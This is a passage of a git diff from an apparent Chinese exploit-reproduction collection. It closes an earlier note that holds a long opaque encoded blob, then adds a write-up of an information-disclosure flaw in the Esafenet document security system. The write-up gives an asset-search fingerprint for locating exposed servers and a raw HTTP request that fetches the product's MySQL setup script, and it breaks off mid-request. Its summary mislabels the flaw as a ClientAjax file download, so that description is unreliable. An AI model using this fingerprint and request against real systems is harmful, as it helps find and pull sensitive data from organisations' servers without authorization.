+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706606838207-3eed0552-fc5c-4e7e-8998-7b3cc4bc2462.png](./img/gYpaKKfdS_r9zElE/1706606838207-3eed0552-fc5c-4e7e-8998-7b3cc4bc2462-925867.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xklz84g3eqsd623r>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统create_SmartSec_mysql信息泄露.md b/亿赛通电子文档安全管理系统create_SmartSec_mysql信息泄露.md
new file mode 100644
index 0000000..406ff7f
--- /dev/null
+++ b/亿赛通电子文档安全管理系统create_SmartSec_mysql信息泄露.md
@@ -0,0 +1,32 @@
+# 亿赛通 电子文档安全管理系统 create_SmartSec_mysql信息泄露
+
+# 一、漏洞简介
+亿赛通电子文档安全管理系统是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通 电子文档安全管理系统 ClientAjax 任意文件下载。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/1GlZaQKLE2cGUVGj/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-425256.png)
+
+# 四、漏洞复现
+```plain
+GET /CDGServer3/SQL/MYSQL/create_SmartSec_mysql.sql HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+Upgrade-Insecure-Requests: 1
